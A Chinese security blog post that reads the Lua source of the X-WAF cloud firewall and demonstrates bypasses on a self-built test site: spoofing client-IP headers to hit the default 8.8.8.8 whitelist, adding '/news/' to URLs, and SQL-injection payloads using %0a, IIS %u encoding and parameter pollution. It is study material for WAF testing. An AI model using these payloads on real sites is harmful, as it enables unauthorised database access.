分析绕过一款适合练手的云WAF

最新推荐文章于 2024-05-14 02:55:47 发布
最新推荐文章于 2024-05-14 02:55:47 发布
阅读量379 收藏 1
点赞数
分类专栏: Web安全
原文链接:https://mp.weixin.qq.com/s/uy4NjyxN_17fCeYETWH1KQ
版权

X-WAF是一款使用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。

本文从代码出发,一步步理解WAF的工作原理,多姿势进行WAF Bypass。

0x01 环境搭建

官网:

https://waf.xsec.io>

github 源码:

https://github.com/xsec-lab/x-waf

X-WAF 下载安装后,设置反向代理访问构造的 SQL 注入点

0x02 代码分析

首先看一下整体的目录结构,nginx_conf目录为参考配置(可删除),rules目录存放过滤规则,init.lua加载规则,access.lua程序启动,config.lua配置文件

主要逻辑实现全部在util.lua和waf.lua文件。

图片

代码逻辑很简单,先熟悉一下检测流程,程序入口在waf.lua第262-274行中:

-- waf start

function _M.check() 
    if _M.white_ip_check() then
    elseif _M.black_ip_check() then
    elseif _M.user_agent_attack_check() then
    elseif _M.white_url_check() then
    elseif _M.url_attack_check() then
    elseif _M.cc_attack_check() then    
    elseif _M.cookie_attack_check() then
    elseif _M.url_args_attack_check() then
    elseif _M.post_attack_check() then
    else
        return
    end`

这个一个多条件判断语句,一旦满足前面的条件就不再进行后面的检测。

白名单

首先判断 IP 白名单,我们来看一下 white_ip_check() 函数,同文件下的第 50-64 行:

-- white ip check

function _M.white_ip_check()
    if config.config_white_ip_check == "on" then
        local IP_WHITE_RULE = _M.get_rule('whiteip.rule')
        local WHITE_IP = util.get_client_ip()
        if IP_WHITE_RULE ~= nil then
            for _, rule in pairs(IP_WHITE_RULE) do
                if rule ~= "" and rulematch(WHITE_IP, rule, "jo") then
                    util.log_record(config.config_log_dir, 'White_IP', ngx.var_request_uri, "_", "_")
                    return true
                end
            end
        end
    end

默认配置IP白名单是开启状态,读取IP白名单规则与获取的客户端IP进行对比,我们再来跟进看一下get_client_ip()函数,在util.lua文件中,第83-96行:

-- Get the client IP

function _M.get_client_ip()
    local CLIENT_IP = ngx.req.get_headers()["X_real_ip"]
    if CLIENT_IP == nil then
        CLIENT_IP = ngx.req.get_headers()["X_Forwarded_For"]
    end
    if CLIENT_IP == nil then
        CLIENT_IP = ngx.var.remote_addr
    end
    if CLIENT_IP == nil then
        CLIENT_IP = ""
    end
    return CLIENT_IP
end

在这段获取客户端IP的代码中,后去的X_real_ip、X_Forwarded_For使用可控的,存在客户端IP地址可伪造的风险。最后再来看一下,rules目录中whiteip.rule的默认配置:

[{"Id": 74, "RuleType": "whiteip", "RuleItem": "8.8.8.8"}]

IP白名单规则默认IP: 8.8.8.8为白名单

因此我们可以通过构造HTTP请求Header实现伪造IP来源为8.8.8.8,从而绕过x-waf的所有安全防御。

Bypass 测试

先来一张拦截效果图

图片

伪造客户端 IP 绕过:

图片

另外有趣的是,在blackip.rule里面,把8.8.8.8放置在黑名单里面,但这并没有什么用,IP白名单已经跳出多条件判断,不会再进行IP黑名单检测。CC攻击的防御也主要是从客户端获取IP,也可以伪造客户端IP轻易绕过限制。

[
    {
        "Id": 2, 
        "RuleType": "blackip",
        "RuleItem": "8.8.8.8"
    },
    {
        "Id": 3, 
        "RuleType": "blackip",
        "RuleItem": "1.1.1.1"
    }
]

同样来看一下url白名单white_url_check()函数:

function _M.white_url_check()
    if config.config_white_url_check == "on" then
        local URL_WHITE_RULES = _M.get_rule('writeurl.rule')
        local REQ_URI = ngx.var.request_uri
        if URL_WHITE_RULES ~= nil then
            for _, rule in paires(URL_WHITE_RULES) do
                if rule ~= "" and rulematch(REQ_URI, rule, "joi") then
                    return true
                end
            end
        end
    end
end

添加了一下URL白名单功能,感觉无效,对比了一下rules文件,可以发现加载的rule文件名不一致。

这里应该是作者的一个笔误,writeurl.rule和whiteUrl.rule。

图片

默认url白名单配置:

[
    {
        "Id": 73,
        "RuleType": "whiteUrl",
        "RuleItem": "/news/"
    }
]

另外,这里使用ngx.re.find进行ngx.var.request_uri和rule匹配,只要url中存在/news/,就不进行检测,绕过安全防御规则。比如:/test/sql,php/news/?id=1、/test/sql,php?id=1&b=/news/等形式可绕过。

正则匹配

接下来,我们主要来看一下M.url_args_attack_check():

-- deny url args

function _M.url_args_attack_check()
    if config.config_url_args_check == "on" then
        local ARGS_RULES = _M.get_rule('args.rule')
        for _, rule in pairs(ARGS_RULES) do
            local REQ_ARGS = ngx.req.get_uri_args()
            for key, val in pairs(REQ_ARGS) do
                local ARGS_DATA = {}
                if type(val) == 'table' then
                    ARGS_DATA = table.concat(val, " ")
                else
                    ARGS_DATA = val
                end
                if ARGS_DATA and type(ARGS_DATA) ~= "boolean" and rule ~= "" and rulematch(unescape(ARGS_DATA), rule, "joi") then
                    util.log_record(config.config_log_dirc, 'Get_Attack', ngx.var.request_uri, "-", rule)
                    if config.config_waf_enable == "on" then
                        util.waf_output()
                        return true
                    end
                end
            end
        end
    end
    return false
end

M.post_attack_check():

-- deny post

function _M.post_attack_check()
    if config.config_post_check == "on" then
        ngx.req.read_body()
        local POST_RULES = _M.get_rule('post.rule')
        for _, rule in pairs(POST_RULES) do
            local POST_ARGS = ngx.req.get_post_args() or {}
            for k, v in pairs(POST_ARGS) do
                local post_data = ""
                if type(v) == "table" then
                    post_data = table.concat(v, ", ")
                elseif type(v) == "boolean" then
                    post_data = k
                else
                    post_data = v
                end
                if rule ~= "" and rulematch(post_data, rule, "joi") then
                    util.log_record(config.config_log_dir, 'Post_Attack', post_data, "-", rule)
                    if config.config_waf_enable == "on" then
                        util.waf_output()
                        return true
                    end
                end
            end
        end
    end
    return false
end

两段函数在一定程度上是类似的,使用ngx.req.get_uri_args、ngx.req.get_post_args获取数据来源,前者来自uri请求参数,而后者来自post请求内容,并未对数据进行特殊处理,然后都使用rulematch(data, rule, "joi") 来进行匹配。

rule中比较关键SQL注入防御规则如下:

`select.+(from|limit)

(?:(union(.*?)select))

(?:form\W+information_schema\W)`

绕过姿势一:%0a

由于使用的是joi来修饰,我们可以用%0a来进行绕过。

/sql.php?id=1 union%0aselect

1, schema_name, 3%0afrom

/*!12345information_schema.schemata*/

图片

绕过姿势二:%u 特性

主要利用 IIS 服务器支持 unicode 的解析

/sql.aspx?id=1    union   selec%u0054
null,table_name,null fro%u004d
information_schema.tables

图片

绕过姿势三:HPP+GPC

使用 GPC 三种方式可以进行参数传递,利用 apsx 特性,将获取到参数拼接起来,可成功 Bypass

/sql.aspx?id=1 union/*

POST:Id=2*/select null,system_user,null

图片

0x03 总结

这是一款适合用来进行 WAF Bypass 练手的云 WAF,通过代码层面熟悉 WAF 的工作原理,进一步理解和应用各种服务器特性、数据库特性来进行尝试 Bypass,期待与你来交流更多姿势。

zhangge3663
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WAF详解及WAF绕过
赤赤三的博客
03-20 8805
waf(web application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF绕过思路
永远是少年
03-12 3534
WAF绕过思路 WAF在渗透测试中,是我们要面对的第一关卡,渗透测试人员对站点WAF绕过过程就是渗透测试人员与网站管理员(或WAF开发者)进行PK的过程。在对WAF的渗透时,一般可以考虑采用以下方式展开。 一、增加WAF负担 WAF是为网站安全服务的,但是WAF的存在如果干扰了网站的正常运行,则会得不偿失,因此,网站管理员一般会恰当的配置WAF,起到在不会干扰网站正常运行的前提下,对用户的输入进行过滤的作用。因此,有些WAF就会设置如果数据包长度过长,就对部分数据包或者是数据包的部分内容进行无检测“放行”
2024年Go最全详解WAF:免费GOODWAF归来_免费waf,跳槽大厂必看
最新发布
2401_84904942的博客
05-14 1043
对于这个话题,大家应该都不陌生了,所以简单介绍一下,也不展开了,主要说说后面的WAF​ ​ ​ ​ ​ ​防火墙(Firewall)——是一种网络安全设备或软件,用于保护计算机网络免受未经授权的访问、恶意攻击和数据泄露等威胁,起到了筛选、监控和控制网络流量的作用,能够有效地降低网络风险和提高安全性。防火墙的分类大致可以分为以下几类:(但WAF的分类并不是固定的,不同厂商的产品可能在实现、功能上、部署位置上、防御策略上等等方面不同的定义和划分;我只是说下当前的几大模型分类。基于网络的WAF
分析绕过一款适合练手 WAF
hl1293348082的专栏
05-31 289
X-WAF一款适用中、小企业的 WAF 系统,让中、小企业也可以非常方便地拥有自己的免费 WAF。 本文从代码出发,一步步理解 WAF 的工作原理,多姿势进行 WAF Bypass。 0x01 环境搭建 官网: https://waf.xsec.io> github 源码: https://github.com/xsec-lab/x-waf X-WAF 下载安装后,设置反向代理访问构造的 SQL 注入点 0x02 代码分析 首先看一下整体的目录结构,nginx_con
waf绕过之——waf注入绕过
温柔小薛的博客
04-28 1525
waf注入绕过 这样算是面试过程中比较经典的一个问题了 网站WAF一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。 功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。 能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。主要是防一些网络层和传输层的攻击 目...
WAF绕过方法
weixin_30590285的博客
07-19 543
1.大小写绕过 这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。 2.简单编码绕过 比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。 也还有大家在Mysql注...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式WAF)等绕过方式。适合初学者进行学习,不适合高手。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
那些年我们绕过WAF
05-07
标题中的“那些年我们绕过WAF”暗示了本文将探讨如何在面对Web应用程序防火墙(WAF)时,采用各种技巧和方法来规避其安全防护。WAF是一种专门用于保护Web应用程序免受常见攻击(如SQL注入、跨站脚本攻击等)的设备...
常见的WAF绕过方法
热门推荐
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
WAF
公众号shadow sock7
06-12 1389
参考: https://mp.weixin.qq.com/s/Qn-zh7SwG9wA3dGEz_AEqA 绕各类WAF是渗透测试人员的一项基本技能。WAF分为 WAF(如 加速乐) 硬件WAF(如 绿盟WAF) 软件WAF(如 安全狗) 代码级WAF mysql注入关键字替换。如在mysql中,WAF将sleep()函数加入黑名单,可以用具备相似功能的benchmark()函数实现绕过。部分
WAF攻防—绕过IP封锁(代理池)
pingan233的博客
03-10 1757
这里演示使用扫目录来进行演示,其它的都是差不多的,在信息收集的时候,除了有些硬性的收集可以使用外部的方式来解决,比如子域名可以使用在线的子域名收集、端口收集可以使用一些在线的端口收集或者手动去扫描,但是像目录这类多数都需要使用本地的字典来扫描。至于你使用payload或者POC被拦截,这个如果说工具是开源的,那么你可以在工具中修改payload或者POC进行绕过绕过说工具不是开源的,那么也是无法绕过的,至少说使用代理池,可以避免自己的IP被封,后续也会有更多的手动操作的机会。所以这里我们都演示一下。
WAF绕过思路整理(挺全)
weixin_50464560的博客
10-23 9046
转载至:https://harmoc.com/secnote/waf%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86.html WAF绕过思路整理 <div class="entry-meta"> <ul class="post-meta"> <li><span class="posted-on"><time class="entry-date p
WAF的工作原理和绕过浅析
jj1130050965的博客
08-01 455
渗透测试 目录 WAF WAF的判断 WAF的工作原理 基于规则库匹配的WAF WAF绕过 域名转换为ip WAF解析HTTP请求阶段绕过 分块编码(Transfer-Encoding)绕过WAF 其他 WAF匹配规则阶段绕过 利用溢量数据绕过WAF 其他 结语 WAF 在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF绕过,而
WAF - SQL注入绕过ngx_lua_waf 靶场实战
weixin_54771278的博客
05-29 660
实验介绍 ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 ,代码很简单,开发初衷主要 是使用简单,高性能和轻量级 实验目的 1. 掌握sql注入绕过ngx_lua_waf的方法与技巧 2. 了解 ngx_lua_waf 过滤方式 靶场环境 LNMP一键安装包+ngx_lua_waf sqli-labs-master靶场+waf 实验步骤 第一步: 我们先来判断注入点 1' and 1=1 --+...
[By Pass] WAF绕过方式
weixin_43586169的博客
06-08 1092
WAF的多种绕过方式
WAF绕过通用思路
Askshhbs的博客
04-26 915
概述 通用的方法,不仅限于SQL注入,就是万金油,无非就是大小写、双写、编码、注释、垃圾字符、分块传输、HPP、WAF特性等 核心:所有能改的地方,都捣鼓捣鼓改改,增加就加,能删就删,多拿点其他内容来混淆视听。 大小写 unIoNSelect 双写 一些后端可能会直接给关键词过滤为空,那么就可以利用双写来绕过 ununionion ==> 去掉union ==> union 编码 URL编码 Unicode编码 十六进制编码 其他后端会解析的编码 注释 如mysql中
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值